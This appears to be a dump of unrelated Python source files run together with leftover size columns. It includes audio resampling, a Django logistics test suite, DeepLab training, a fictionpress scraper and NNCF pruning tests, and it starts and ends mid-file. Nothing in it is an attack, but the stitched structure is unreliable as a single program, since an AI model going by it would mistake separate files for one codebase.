    os.makedirs(os.path.dirname(destino), exist_ok=True)
    sqr_img.save(destino)
| 1,988 | 897 |
from . import console
from .version import __version__ # noqa
def main():
    """Package entry point: delegate to the interactive console runner."""
    console.run()
| 95 | 30 |
"""
@FileName: resample.py
@Description: Implement resample
@Author: Ryuk
@CreateDate: 2021/06/27
@LastEditTime: 2021/06/27
@LastEditors: Please set LastEditors
@Version: v0.1
"""
import numpy as np
import math
__all__ = [
"direct_interpolation",
"lagrange_interpolation",
"sine_interpolation",
]
def direct_interpolation(x, L, M):
    """
    resample signal with direct (linear) interpolation
    :param x: input signal
    :param L: original frequency
    :param M: target frequency
    :return: resampled signal
    """
    N = len(x)
    K = int((M / L) * N)
    step = L / M
    y = np.zeros(K)
    for k in range(K):
        position = step * k
        left = math.floor(position)
        right = left + 1
        # Samples whose right neighbour falls outside the input stay zero.
        if right >= len(x):
            continue
        frac = position - left
        y[k] = frac * x[right] + (1 - frac) * x[left]
    return y
def lagrange_interpolation(x, w, L, M):
    """
    resample signal with Lagrange polynomial interpolation over a 2w-point window
    :param x: input signal
    :param w: half-width of the interpolation window (uses nodes i in [-w, w))
    :param L: original frequency
    :param M: target frequency
    :return: resampled signal
    """
    N = len(x)
    K = int((M / L) * N)
    factor = L / M
    y = np.zeros(K)
    for k in range(K):
        nk = factor * k
        # Window anchor; one sample left of the interpolation point.
        n = math.floor(nk) - 1
        for i in range(-w, w, 1):
            numerator = 1
            denominator = 1
            # Skip nodes past the right edge of the signal.
            # NOTE(review): n - i can be negative here (e.g. k == 0), and a
            # negative index wraps to the END of x in Python — presumably
            # unintended edge behavior; confirm before relying on the first
            # few output samples.
            if n - i >= len(x): continue
            for j in range(-w, w, 1):
                if i != j:
                    numerator *= nk - (n - j)
                    denominator *= (j - i)
            y[k] += x[n - i] * numerator / denominator
    return y
def sine_interpolation(x, w, L, M):
    """
    resample signal with truncated sinc (Whittaker-Shannon) interpolation
    :param x: input signal
    :param w: half-width of the sinc window (uses samples x[n-i], i in [-w, w))
    :param L: original frequency
    :param M: target frequency
    :return: resampled signal
    """
    N = len(x)
    K = int((M / L) * N)
    factor = L / M
    y = np.zeros(K)
    for k in range(K):
        nk = factor * k
        n = math.floor(nk)
        for i in range(-w, w, 1):
            # BUG FIX: also guard against negative indices, which silently
            # wrapped to the end of the signal.
            if n - i >= len(x) or n - i < 0: continue
            u = nk - n + i
            if u == 0:
                # BUG FIX: sinc(0) == 1, so an exactly-aligned sample must
                # contribute x[n - i]; the original skipped it, zeroing the
                # output at integer resampling positions.
                y[k] += x[n - i]
            else:
                # BUG FIX: the normalized sinc kernel is sin(pi*u)/(pi*u);
                # the original omitted pi in the numerator.
                y[k] += x[n - i] * math.sin(math.pi * u) / (math.pi * u)
    return y
| 1,840 | 705 |
import numpy as np
from device_saver import load_device
""" Opens a device and prints its stored stats for the paper"""
def get_stats(fname):
    """Load a saved device pickle and print the stats reported in the paper.

    :param fname: path to a device file readable by device_saver.load_device
    """
    print("\n============================================================")
    D = load_device(fname)
    print('input power of {:.4f} mW/um'.format(D.W_in*1000))
    # Older saved devices may lack a precomputed index shift; fall back to
    # recomputing it from the stored simulation.
    if hasattr(D, 'index_shift'):
        index_shift = D.index_shift
    else:
        index_shift = D.simulation.compute_index_shift()
    print('index shift: {:.2E}'.format(np.max(index_shift)))
    print('Q-factor: {:.2E}'.format(D.Q))
    print('bandwidth: {:.1f} GHz'.format(D.FWHM / 1e9))
    # Transmission stats depend on the stored device topology.
    if D.structure_type == 'two_port':
        print('linear transmission: {:.4f}'.format(D.T_lin))
        print('nonlinear transmission: {:.4f}'.format(D.T_nl))
    elif D.structure_type == 'ortho_port':
        print('linear transmission (right) = {:.4f} %'.format(100*D.W_right_lin / D.W_in))
        print('linear transmission (top) = {:.4f} %'.format(100*D.W_top_lin / D.W_in))
        print('nonlinear transmission (right) = {:.4f} %'.format(100*D.W_right_nl / D.W_in))
        print('nonlinear transmission (top) = {:.4f} %'.format(100*D.W_top_nl / D.W_in))
    print("============================================================\n")
if __name__ == '__main__':
    # Print the stored stats for the two devices used in the paper figures.
    fname2 = 'data/figs/devices/2_port.p'
    get_stats(fname2)
    fnameT = 'data/figs/devices/T_port.p'
    get_stats(fnameT)
import os
import zipfile
import tensorflow as tf
import tensorflow_datasets as tfds
import init_path
from configs.configs import parse_configs
from detection.utils.Label import *
from detection.utils.preprocess import *
from model.network import DecodePredictions
from model.get_model import backbone, models
config = parse_configs()
def get_demo_data():
    """Download the demo dataset archive (if needed) and unpack it under data_demo/."""
    url = "https://github.com/srihari-humbarwadi/datasets/releases/download/v0.1.0/data.zip"
    archive_path = os.path.join(config.root_dir, "data_demo", "data.zip")
    tf.keras.utils.get_file(archive_path, url)
    with zipfile.ZipFile(archive_path, "r") as archive:
        archive.extractall(os.path.join(config.root_dir,"data_demo/"))
def demo():
    """Run detection inference on two COCO validation images and visualize the results."""
    get_demo_data()
    model = models[config.Arch](config.num_classes, backbone[config.backbone])
    # fine_tune_checkpoint_type
    # Restore the most recent checkpoint; expect_partial() silences warnings
    # about training-only state (e.g. optimizer slots) not needed here.
    ckpt = tf.train.Checkpoint(model)
    ckpt.restore(tf.train.latest_checkpoint(config.weight)).expect_partial()
    # Prepare image for demo
    val_dataset, dataset_info = tfds.load("coco/2017",
                                          split="validation",
                                          with_info=True,
                                          data_dir=os.path.join(config.root_dir,"data_demo/data"),
                                          download=False)
    # Maps integer class ids to human-readable COCO label names.
    int2str = dataset_info.features["objects"]["label"].int2str
    for sample in val_dataset.take(2):
        image = tf.cast(sample["image"], dtype=tf.float32)
        # NOTE(review): ratio_short/ratio_long presumably undo the resize when
        # drawing boxes on the original image — confirm in prepare_image.
        input_image, ratio_short, ratio_long = prepare_image(image)
        # Inference
        predictions = model(input_image)
        detections = DecodePredictions(confidence_threshold=0.5)(input_image, predictions)
        # Only the first valid_detections entries of each output are real.
        num_detections = detections.valid_detections[0]
        class_names = [int2str(int(x)) for x in detections.nmsed_classes[0][:num_detections]]
        visualize_detections(image,
                             detections.nmsed_boxes[0][:num_detections].numpy(),
                             class_names,
                             detections.nmsed_scores[0][:num_detections].numpy(),
                             ratio_short, ratio_long
                             )
if __name__ == "__main__":
    demo()
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class Person(models.Model):
    """A known contact, keyed by their Facebook id."""
    first_name = models.CharField(max_length=30)
    last_name = models.CharField(max_length=30)
    # Facebook id doubles as the primary key, so each contact is stored once.
    fbid = models.CharField(max_length=64, primary_key=True)
    # Most recent message associated with this person.
    # NOTE(review): presumably updated elsewhere on each new message — confirm.
    last_message = models.CharField(max_length=255)
| 337 | 111 |
from datetime import datetime
from django.contrib.auth.hashers import make_password
from Logistics.models import LogisticCompanies
from roles_and_permissions.operations import Operations
from roles_and_permissions.resource_categories import ResourceCategories
from roles_and_permissions.utils import createStaffRole
from .models import StopFeedback, Stops
import uuid
from django.conf import settings
from django.test import Client, TestCase
from Users.models import Drivers
# Create your tests here.
# Module-level test client and request defaults shared by every test case below.
client = Client()
secret = settings.ROOT_SECRET
content_type = "application/json"
class StopTests(TestCase):
    """CRUD tests for the /v1/stops endpoints.

    setUpTestData provisions a logistics company (with its admin staff
    account), a driver, and one pre-existing stop for the retrieve/update/
    delete tests to operate on.
    """

    @classmethod
    def setUpTestData(cls):
        company_payload = {
            "name": "New Logistics5",
            "email": "info@newlogistics5.com",
            "phone": "08099514386",
            "address": "plot 7, The providince street",
            "city": "Shasha",
            "state": "Lagos",
            "country": "Nigeria",
            "description": "the powerful logistics",
            "motto": "the best",
            "administratorLastName": "Umoh",
            "administratorFirstName": "Simeon",
            "administratorUsername": "simeone05",
            "administratorEmail": "simeoneumoh@gmail.com",
            "administratorPhone": "08099514739",
            "administratorPassword": "mickey01"
        }
        client.post(
            '/v1/logistics', company_payload, content_type=content_type, HTTP_Secret=secret
        )
        # Log in as the freshly created administrator, then register a driver.
        login_payload = {
            "userIdentity": "08099514739",
            "password": "mickey01",
        }
        driver_payload = {
            "firstname": "Simeone",
            "lastname": "Umoh",
            "username": "simlogistics",
            "email": "simonumoh@mailinator.com",
            "phone": "+234567890",
            "password": "whatever1"
        }
        login_response = client.post(path="/v1/login", data=login_payload,
                                     content_type="application/json",
                                     HTTP_SECRET=settings.TEST_SECRET, follow=True,
                                     secure=False, HTTP_ACCEPT='application/json', )
        client.post(path="/v1/users/drivers", data=driver_payload, follow=True,
                    secure=False,
                    HTTP_ACCEPT='application/json',
                    content_type="application/json",
                    HTTP_SECRET=settings.TEST_SECRET,
                    HTTP_Token=login_response.json()['data']['accessToken']
                    )
        company = LogisticCompanies.objects.first()
        driver = Drivers.objects.get(user_name="simlogistics")
        # One pre-existing stop; objects.create already persists it.
        Stops.objects.create(
            id=int(str(uuid.uuid4().int)[::6]),
            sender_name='Simeon Umoh',
            sender_address='14 Ogidi Crescent, Lagos',
            sender_phone='08099514739',
            sender_email='simeoneumoh@gmail.com',
            receiver_name='Matthew Odeyemi',
            receiver_address='Plot 8 the Providence Street',
            receiver_phone='08160267172',
            receiver_email='mattode@outlook.com',
            vehicle_type='motorcycle',
            additional_note='apartment',
            stop_time_window='50',
            load_capacity='large',
            stop_duration='10',
            priority_level='normail',  # NOTE(review): looks like a typo for 'normal' — kept as-is
            driver=driver,
            company=company
        )

    @staticmethod
    def _staff_token():
        """Log in as the company administrator and return the API access token."""
        login_payload = {
            "userIdentity": "08099514739",
            "password": "mickey01",
        }
        login_response = client.post(path="/v1/login?user_type=staff", data=login_payload,
                                     content_type="application/json", HTTP_Secret=secret,
                                     )
        return login_response.json()['data']['accessToken']

    @staticmethod
    def _stop_payload(driver_id):
        """Request body shared by the create and update tests."""
        return {
            "senderName": "Simeon Umoh",
            "senderAddress": "14 Ogidi Crescent, Lagos",
            "senderPhone": "08099514739",
            "senderEmail": "simeoneumoh@gmail.com",
            "receiverName": "Matthew Odeyemi",
            "receiverAddress": "Plot 8 the Providence Street",
            "receiverPhone": "08160267172",
            "receiverEmail": "mattode@outlook.com",
            "vehicleType": "motorcycle",
            "additionalNote": "Bring to the apartment",
            "stopTimeWindow": "50",
            "driverId": driver_id,
            "loadCapacity": "large",
            "stopDuration": "10",
            "priorityLevel": "normal"
        }

    def test_createStop(self):
        driverId = Drivers.objects.get(user_name="simlogistics").id
        response = client.post('/v1/stops', self._stop_payload(driverId),
                               content_type=content_type,
                               HTTP_Token=self._staff_token()
                               )
        # Check that the response is 200 OK.
        self.assertEqual(response.status_code, 200)

    def test_retrieveCompanyStops(self):
        response = client.get('/v1/stops',
                              content_type=content_type,
                              HTTP_Token=self._staff_token()
                              )
        self.assertEqual(response.status_code, 200)

    def test_updateStop(self):
        stopId = Stops.objects.first().id
        driverId = Drivers.objects.get(user_name="simlogistics").id
        response = client.put(f'/v1/stops/{stopId}', self._stop_payload(driverId),
                              content_type=content_type,
                              HTTP_Token=self._staff_token()
                              )
        self.assertEqual(response.status_code, 200)

    def test_updateStopStatus(self):
        stopId = Stops.objects.first().id
        payload = {
            "feedback": "Completed"
        }
        response = client.put(f'/v1/stops/{stopId}?status=arrived', payload,
                              content_type=content_type,
                              HTTP_Token=self._staff_token()
                              )
        self.assertEqual(response.status_code, 200)

    def test_retrieveStop(self):
        stopId = Stops.objects.first().id
        response = client.get(f'/v1/stops/{stopId}',
                              content_type=content_type,
                              HTTP_Token=self._staff_token()
                              )
        self.assertEqual(response.status_code, 200)

    def test_deleteStop(self):
        stopId = Stops.objects.first().id
        response = client.delete(f'/v1/stops/{stopId}',
                                 content_type=content_type,
                                 HTTP_Token=self._staff_token()
                                 )
        self.assertEqual(response.status_code, 200)
class FeedbackTest(TestCase):
    """Tests for the /v1/stops/feedback endpoints."""

    @classmethod
    def setUpTestData(cls):
        # Build the minimal object graph directly:
        # company -> role -> driver -> stop -> feedback.
        company = LogisticCompanies.objects.create(
            id=1,
            name="First Company",
            email="test@mail.com",
            phone="08123456789",
            address="address",
            city="city",
            state="state",
            country="country",
            logo="logo",
            description="description",
            motto="motto",
            paid_until="2021-08-08",
            created_at=datetime.now()
        )
        resources = ResourceCategories.list()
        operations = Operations.list()
        # Grant the staff role every operation on every resource category.
        permissions = {resource: operations for resource in resources}
        role = createStaffRole(
            "company_admin",
            permissions,
            company
        )
        role.save()
        driver = Drivers.objects.create(
            id=int(str(uuid.uuid4().int)[::6]),
            first_name="Benevolent",
            last_name="Gand",
            user_name="bcx",
            phone="08111111111",
            email="test@mail.com",
            password=make_password("password"),
            role=role,
            company=company,
            created_at=datetime.now()
        )
        stop = Stops.objects.create(
            id=int(str(uuid.uuid4().int)[::6]),
            sender_name='Simeon Umoh',
            sender_address='14 Ogidi Crescent, Lagos',
            sender_phone='08099514739',
            sender_email='simeoneumoh@gmail.com',
            receiver_name='Matthew Odeyemi',
            receiver_address='Plot 8 the Providence Street',
            receiver_phone='08160267172',
            receiver_email='mattode@outlook.com',
            vehicle_type='motorcycle',
            additional_note='apartment',
            stop_time_window='50',
            load_capacity='large',
            stop_duration='10',
            priority_level='normail',  # NOTE(review): looks like a typo for 'normal' — kept as-is
            driver=driver,
            company=company
        )
        StopFeedback.objects.create(
            message="This is an automated message",
            # file=file,
            stop=stop
        )

    @staticmethod
    def _staff_token(browser):
        """Log in as the seeded staff driver and return the API access token."""
        login_payload = {
            "userIdentity": "bcx",
            "password": "password",
        }
        login_response = browser.post(path="/v1/login?user_type=staff", data=login_payload,
                                      content_type="application/json",
                                      HTTP_SECRET=settings.TEST_SECRET, follow=True,
                                      secure=False, HTTP_ACCEPT='application/json', )
        return login_response.json()['data']['accessToken']

    def test_create_stop_feedback(self):
        browser = Client()
        stop = Stops.objects.get(receiver_phone='08160267172').id
        feedback_payload = {
            "message": "message",
            "stop": stop
        }
        response = browser.post(path="/v1/stops/feedback", data=feedback_payload,
                                follow=True, secure=False,
                                HTTP_ACCEPT='application/json',
                                content_type="application/json",
                                HTTP_SECRET=settings.TEST_SECRET,
                                HTTP_Token=self._staff_token(browser)
                                )
        self.assertEqual(response.status_code, 200)

    def test_get_all_stop_feedbacks(self):
        browser = Client()
        response = browser.get(path="/v1/stops/feedback", follow=True, secure=False,
                               HTTP_ACCEPT='application/json', content_type="application/json",
                               HTTP_SECRET=settings.TEST_SECRET,
                               HTTP_Token=self._staff_token(browser))
        self.assertEqual(response.status_code, 200)

    def test_retrieve_stop_feedback(self):
        browser = Client()
        feedback_id = StopFeedback.objects.first().id
        response = browser.get(path="/v1/stops/feedback/{}".format(feedback_id), follow=True,
                               secure=False,
                               HTTP_ACCEPT='application/json', content_type="application/json",
                               HTTP_SECRET=settings.TEST_SECRET,
                               HTTP_Token=self._staff_token(browser)
                               )
        self.assertEqual(response.status_code, 200)

    # A commented-out delete test (targeting a non-existent /v1/stop/feedback/<id>
    # route) was removed as dead code; recover it from VCS history if needed.
| 16,569 | 4,566 |
def classify_triangle(a: float, b: float, c: float) -> str:
    """Classify a triangle by its side lengths.

    Returns 'equilátero', 'escaleno', or 'isósceles', or '' when the three
    segments cannot form a triangle.
    """
    # Triangle inequality: each side must be strictly shorter than the sum of
    # the other two. (Bug fix: the original third check was `r3 < r2 + r3`,
    # which is always true, so e.g. 1, 2, 10 was accepted.)
    if not (a < b + c and b < a + c and c < a + b):
        return ''
    if a == b == c:
        return 'equilátero'
    if a != b and b != c and a != c:
        return 'escaleno'
    return 'isósceles'


def main() -> None:
    """Read three segment lengths and report whether they form a triangle."""
    r1 = float(input('Primeiro segmento: '))
    r2 = float(input('Segundo segmento: '))
    r3 = float(input('Terceiro segmento: '))
    tipo = classify_triangle(r1, r2, r3)
    if tipo:
        print('Você \033[32mpode\033[m formar um triângulo. ', end='')
        print(f'Seu triângulo é \033[36m{tipo}\033[m.')
    else:
        print('Você \033[31mnão pode\033[m formar um triângulo.')


if __name__ == '__main__':
    main()
| 550 | 275 |
"""Mimic main window."""
import tkinter as tk
from mimic.EventEmitter import EventEmitter
from mimic.GUI.AbstractTkinterWindow import AbstractTkinterWindow
from mimic.GUI.Widgets.QRCode import QRCodeImage
from mimic.Utils.Host import resolve_host
class MainWindow(AbstractTkinterWindow, EventEmitter):
    """Mimic main window."""

    # NOTE(review): class-level mutable list is shared by all instances;
    # nothing in this file ever appends to it — confirm it is still needed.
    widgets: list[tk.Widget] = []

    def __init__(self, master: tk.Tk):
        """
        Attaches main window to the main Tkinter instance.

        Should only pass the main Tkinter instance as the `master`.
        Behavior is untested when windows are nested inside each other.

        Args:
            master (tk.Tk): Master Tkinter instance
        """
        super().__init__(master)
        self.master = master
        self.title("Mimic")
        # Window starts hidden; callers show it explicitly.
        self.hide()
        self.create_widgets()
        # Hide when the close button ("x button") is clicked
        self.protocol("WM_DELETE_WINDOW", self.hide)

    def create_widgets(self):
        """Register widgets to window."""
        # QR code pointing browsers at this machine's HTTPS endpoint on port 8080.
        qr_code = QRCodeImage(self, f"https://{resolve_host()}:8080")
        qr_code.pack()
| 1,158 | 364 |
from django.conf import settings
from django.template.loader import render_to_string
import ConfigParser
from collections import OrderedDict
import sys
from Crypto.PublicKey import RSA
class AllowsSameKeys(OrderedDict):
    """OrderedDict that merges list values of duplicate keys instead of replacing them."""

    def __setitem__(self, key, value):
        if isinstance(value, list) and key in self:
            self[key].extend(value)
        else:
            # Bug fix: `super(OrderedDict, self)` skipped OrderedDict's own
            # __setitem__ and went straight to dict's, corrupting the ordering
            # bookkeeping; delegate to the immediate parent instead.
            super(AllowsSameKeys, self).__setitem__(key, value)
# Parse the ini file given as argv[1]; AllowsSameKeys accumulates values of
# duplicate option names into lists instead of overwriting them.
c = ConfigParser.ConfigParser(dict_type=AllowsSameKeys)
c.readfp(open(sys.argv[1]))
# django snippet 646, raise an Exception missing var
class InvalidVarException(object):
    """TEMPLATE_STRING_IF_INVALID stand-in that raises on any missing template variable."""

    def __mod__(self, missing):
        try:
            missing_str = unicode(missing)
        except Exception:  # narrowed from a bare except: don't mask SystemExit/KeyboardInterrupt
            missing_str = 'Failed to create string representation'
        raise Exception('Unknown template variable %r %s' % (missing, missing_str))

    def __contains__(self, search):
        # Django probes membership with '%s' to decide whether to %-format us.
        return search == '%s'
# Configure Django standalone: template dir plus fail-fast on unknown variables.
settings.configure(TEMPLATE_DIRS=('uwsgi_it_api/templates',), TEMPLATE_STRING_IF_INVALID=InvalidVarException())
# Fresh 2048-bit RSA key pair for the container's customer section below.
rsa_key = RSA.generate(2048).exportKey()
container = {
    'name': '30000',
    # api_domain with dots swapped for dashes, e.g. "api.example.com" -> "api-example-com".
    'hostname': c.get('uwsgi','api_domain')[0].replace('.','-'),
    'uid': 30000,
    'ip': '10.0.0.2',
    'server': {
        'hd':c.get('uwsgi','api_hd')[0],
        'etc_resolv_conf_lines': c.get('uwsgi','api_resolvconf'),
        'etc_hosts_lines': c.get('uwsgi','api_hosts'),
    },
    'quota': 20 * 1024 * 1024 * 1024,  # 20 GiB disk quota
    'memory_limit_in_bytes': 1024 * 1024 * 1024,  # 1 GiB
    'distro': {'path': 'precise'},
    'quota_threshold': 90,
    'ssh_keys': c.get('uwsgi','api_ssh_key'),
    'customer': {
        'rsa_key_lines': rsa_key.split('\n'),
        'rsa_pubkey_lines': RSA.importKey(rsa_key).publickey().exportKey().split('\n'),
    },
}
# Render the uWSGI vassal configuration to stdout (Python 2 print statement).
print render_to_string('vassal.ini', {'container': container})
| 1,857 | 656 |
import argparse
import os
import os.path as osp
import torch
import torch.nn as nn
import torch.optim as optim
from eval import evaluate
from ever.core.iterator import Iterator
from module.deeplabv2 import Deeplab
from torch.nn import functional as fn
from tqdm import tqdm
from data.loveda import LoveDALoader
from utils.tools import (
adjust_learning_rate,
count_model_parameters,
get_console_file_logger,
import_config,
loss_calc,
seed_torch,
)
# CLI: the only argument is the path to the experiment config file.
parser = argparse.ArgumentParser(description='Run Baseline methods.')
parser.add_argument('--config_path', type=str, help='config path')
args = parser.parse_args()
# Module-level config object used by main() below.
cfg = import_config(args.config_path)
def main():
    """Create the model and start the training."""
    os.makedirs(cfg.SNAPSHOT_DIR, exist_ok=True)
    logger = get_console_file_logger(name='Deeplabv2', logdir=cfg.SNAPSHOT_DIR)
    # Create Network
    model = Deeplab(nn.BatchNorm2d, num_classes=7)
    # model = Deeplabv2(
    #     dict(
    #         backbone=dict(
    #             resnet_type='resnet50',
    #             output_stride=16,
    #             pretrained=True,
    #         ),
    #         multi_layer=False,
    #         cascade=False,
    #         use_ppm=False,
    #         ppm=dict(
    #             num_classes=7,
    #             use_aux=False,
    #             norm_layer=nn.BatchNorm2d,
    #         ),
    #         inchannels=2048,
    #         num_classes=7))
    model.train()
    model.cuda()
    #cudnn.enabled = True
    #cudnn.benchmark = True
    logger.info('exp = %s' % cfg.SNAPSHOT_DIR)
    count_model_parameters(model, logger)
    trainloader = LoveDALoader(cfg.SOURCE_DATA_CONFIG)
    # NUM_STEPS_STOP counts iterations; log the equivalent number of epochs.
    epochs = cfg.NUM_STEPS_STOP / len(trainloader)
    logger.info('epochs ~= %.3f' % epochs)
    trainloader_iter = Iterator(trainloader)
    optimizer = optim.SGD(
        model.parameters(), lr=cfg.LEARNING_RATE, momentum=cfg.MOMENTUM, weight_decay=cfg.WEIGHT_DECAY)
    # model, optimizer = amp.initialize(model, optimizer, opt_level="O1")
    optimizer.zero_grad()
    for i_iter in tqdm(range(cfg.NUM_STEPS_STOP)):
        optimizer.zero_grad()
        lr = adjust_learning_rate(optimizer, i_iter, cfg)
        # Train with Source
        batch = trainloader_iter.next()
        images_s, labels_s = batch[0]
        pred_source = model(images_s.cuda())
        # pred_source is a dict with features and actual output
        pred_source = pred_source["out"]
        # Upsample logits to label resolution; assumes labels_s["cls"] is
        # (batch, H, W) — TODO confirm against LoveDALoader.
        pred_source = fn.interpolate(pred_source, labels_s["cls"].size()[1:], mode="bilinear", align_corners=True)
        #Segmentation Loss
        loss = loss_calc(pred_source, labels_s['cls'].cuda())
        loss.backward()
        optimizer.step()
        if i_iter % 50 == 0:
            logger.info('exp = {}'.format(cfg.SNAPSHOT_DIR))
            text = 'iter = %d, loss_seg = %.3f, lr = %.3f' % (i_iter, loss, lr)
            logger.info(text)
        if i_iter >= cfg.NUM_STEPS_STOP - 1:
            # Final checkpoint + evaluation, then stop training.
            print('save model ...')
            ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(cfg.NUM_STEPS_STOP) + '.pth')
            torch.save(model.state_dict(), ckpt_path)
            evaluate(model, cfg, True, ckpt_path, logger)
            break
        if i_iter % cfg.EVAL_EVERY == 0 and i_iter != 0:
            # Periodic checkpoint + evaluation; model.train() afterwards
            # restores training mode (evaluate presumably switches to eval —
            # confirm in eval.evaluate).
            ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(i_iter) + '.pth')
            torch.save(model.state_dict(), ckpt_path)
            evaluate(model, cfg, True, ckpt_path, logger)
            model.train()
if __name__ == '__main__':
    # Fixed seed for reproducibility before building data pipelines and model.
    seed_torch(2333)
    main()
| 3,561 | 1,271 |
import os
def beforeSaveFile(fname):
    '''Make sure the parent directory of *fname* exists before saving the file.'''
    dirname = os.path.dirname(fname)
    # exist_ok avoids the check-then-create race of the previous
    # `if not exists: makedirs` pattern; the guard skips bare filenames,
    # for which os.makedirs('') would raise FileNotFoundError.
    if dirname:
        os.makedirs(dirname, exist_ok=True)
| 201 | 70 |
# Generated by Django 2.2 on 2019-04-22 13:45
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
    """Initial migration for this app: creates the Estimator model."""

    initial = True

    dependencies = [
        ('projects', '0030_allow_null_in_projects_groups_and_layers_file'),
    ]

    operations = [
        migrations.CreateModel(
            name='Estimator',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Stable external identifier, independent of the auto PK.
                ('uuid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True)),
                ('estimator_type', models.CharField(choices=[('OD', 'Object detection')], default='OD', max_length=2, verbose_name='estimator type')),
                ('name', models.CharField(max_length=255, verbose_name='name')),
                ('metadata', django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True)),
                ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='created at')),
                ('updated_at', models.DateTimeField(auto_now=True, verbose_name='updated at')),
                ('project', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='projects.Project', verbose_name='project')),
            ],
            options={
                # An estimator name is unique per (project, estimator type).
                'unique_together': {('project', 'estimator_type', 'name')},
            },
        ),
    ]
| 1,478 | 444 |
from pathlib import Path
from typing import Callable, Iterable, Iterator, List
from itertools import chain, cycle, islice, repeat
import numpy as np
BASE_PATTERN = [0, 1, 0, -1]
def read_lines() -> Iterator[str]:
    """Yield the lines of input.txt (next to this file), trailing whitespace stripped."""
    input_path = Path(__file__).parent / "input.txt"
    with input_path.open("r") as handle:
        yield from (raw.rstrip() for raw in handle)
def get_inputs() -> Iterator[int]:
    """Yield each digit of the first input line as an int."""
    first_line = list(read_lines())[0]
    yield from map(int, first_line)
def repeat_each(pattern, repeats: int):
    """Repeat every element of *pattern* `repeats` times, preserving order."""
    return chain.from_iterable(repeat(item, repeats) for item in pattern)
def generate_pattern(base: Iterable[int], repeats: int, length: int) -> Iterator[int]:
    """Generate the pattern as specified by the algorithm.

    Example:
        >>> list(generate_pattern([0, 1, 0, -1], 2, 15))
        [0, 1, 1, 0, 0, -1, -1, 0, 0, 1, 1, 0, 0, -1, -1]
    """
    stretched = cycle(repeat_each(base, repeats))
    # Drop the leading element and cap the stream at `length`, per the FFT spec.
    return islice(stretched, 1, length + 1)
def create_filter_matrix(length: int) -> np.array:
    """Build the length x length FFT filter matrix, one pattern row per output digit."""
    rows = [list(generate_pattern(BASE_PATTERN, row + 1, length)) for row in range(length)]
    return np.array(rows)
def create_input_vector() -> np.array:
    """Load the puzzle input digits into a 1-D integer numpy array."""
    digits = list(get_inputs())
    return np.array(digits)
def create_last_digit_filter() -> Callable:
    """Return a vectorized function mapping each value to the last digit of its absolute value."""
    def last_digit(value):
        return abs(value) % 10
    return np.vectorize(last_digit)
def perform_fft(iterations: int) -> np.array:
    """Run `iterations` FFT phases over the puzzle input and return the final signal."""
    signal = create_input_vector()
    matrix = create_filter_matrix(len(signal))
    keep_last_digit = create_last_digit_filter()
    for _ in range(iterations):
        # One phase: matrix multiply, then keep only the last digit of each entry.
        signal = keep_last_digit(matrix @ signal)
    return signal
# print(list(generate_pattern(2, 10)))
# Part 1 answer: the first eight digits after 100 FFT phases.
print(perform_fft(100)[:8])
from bs4 import BeautifulSoup
import urllib2
# Python 2 scraper: walks a fictionpress.com story chapter by chapter and
# appends the paragraph text to fiction.txt until a chapter has no story body.
start_url="https://www.fictionpress.com/s/2780124/1/Rise-From-The-Ashes-OLD" #start url
end =False
# Keep the scheme/host/"s"/story-id prefix (first 5 URL components).
split_url=start_url.split("/")
new_url=""
for i in range(5):
    new_url=new_url+split_url[i]+"/"
# NOTE(review): new_url already ends with '/', so the concatenation below
# yields a double slash ("...//1/") — confirm the site tolerates this.
i=1
while not (end):
    url=new_url+"/"+str(i)+"/"
    i=i+1
    response=urllib2.urlopen(url)
    html_text=response.read()
    response.close()
    foo=open("fiction.txt","a")##File path where you want to save this file
    soup=BeautifulSoup(html_text)
    raw_story = soup.select("div > #storytext > p ")
    if raw_story:
        title = raw_story[0].get_text()
        print title
        for line in raw_story:
            foo.write(line.get_text().encode('utf-8')+"\n")
        foo.write("\n ----><-----\n\n\n")
    else:
        # No story paragraphs on this page: we walked past the last chapter.
        print "<--the end-->"
        end=True
        foo.write("\n------------~~~~~~~~~--------------")
    foo.close()
| 925 | 351 |
"""
Copyright (c) 2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pytest
from tests.tensorflow.helpers import create_compressed_model_and_algo_for_test
from tests.tensorflow.pruning.helpers import get_basic_pruning_config
from tests.tensorflow.pruning.helpers import get_test_model_shared_convs
@pytest.mark.parametrize(
    ("model", "all_weights", "ref_full_flops", "ref_current_flops",
     "ref_full_params", "ref_current_params"),
    (
        # Precomputed reference counts for the shared-convolutions model,
        # with and without the `all_weights` pruning mode.
        (get_test_model_shared_convs, True, 461438976, 276385312,
         11534848, 6908711),
        (get_test_model_shared_convs, False, 461438976, 270498816,
         11534848, 6761608)
    )
)
def test_flops_calulation_for_spec_layers(model, all_weights, ref_full_flops, ref_current_flops,
                                          ref_full_params, ref_current_params):
    # NOTE(review): "calulation" is a typo for "calculation"; renaming would
    # change the collected test id, so it is kept as-is.
    config = get_basic_pruning_config(8)
    config['compression']['algorithm'] = 'filter_pruning'
    # Prune 40% at init and target a 40% FLOPs reduction, including the
    # first and last convolutions.
    config['compression']['pruning_init'] = 0.4
    config['compression']['params']['pruning_flops_target'] = 0.4
    config['compression']['params']['prune_first_conv'] = True
    config['compression']['params']['prune_last_conv'] = True
    config['compression']['params']['all_weights'] = all_weights
    input_shape = [1, 8, 8, 1]
    model = model(input_shape)
    model.compile()
    _, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)
    # FLOPs and parameter counts must match the references exactly.
    assert compression_ctrl.full_flops == ref_full_flops
    assert compression_ctrl.full_params_num == ref_full_params
    assert compression_ctrl.current_flops == ref_current_flops
    assert compression_ctrl.current_params_num == ref_current_params
| 2,161 | 734 |
from .style import LineStyle
# Public API of this package.
__all__ = [
    "LineStyle",
